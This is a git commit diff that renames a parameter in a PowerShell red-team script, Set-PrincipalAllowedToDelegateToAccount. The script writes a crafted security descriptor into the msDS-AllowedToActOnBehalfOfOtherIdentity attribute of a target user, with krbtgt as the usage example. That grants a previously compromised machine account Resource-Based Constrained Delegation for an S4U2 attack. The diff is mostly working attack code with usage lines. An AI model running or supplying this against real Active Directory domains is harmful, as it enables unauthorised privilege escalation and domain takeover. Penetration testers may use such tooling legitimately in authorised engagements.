fixed paramter name

This commit is contained in:
mgeeky 2019-08-22 15:46:08 +02:00
parent 0062483b8b
commit a99ab7a0bf
1 changed files with 6 additions and 6 deletions

View File

@ -3,10 +3,10 @@
#
# Usage:
# PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
# PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$
# PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -DelegateFrom COMPROMISED$
#
# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use
# of Resource-Based Constrained Delegation flavour attack.
# Will allow for COMPROMISED$ account to perform S4U2 constrained delegation by the use
# of Resource-Based Constrained Delegation flavour attack. This account must have any SPN set first.
#
# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object,
# allowing incoming trust to the previously compromised Machine object, as described
@ -31,11 +31,11 @@ function Set-PrincipalAllowedToDelegateToAccount
[Parameter(Position = 1)]
[ValidateNotNullOrEmpty()]
[String]
$TargetComputer
$DelegateFrom
)
# translate the identity to a security identifier
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $DelegateFrom).Translate([System.Security.Principal.SecurityIdentifier])).Value
# Substitute the security identifier into the raw SDDL
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
@ -46,4 +46,4 @@ function Set-PrincipalAllowedToDelegateToAccount
# set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
}
}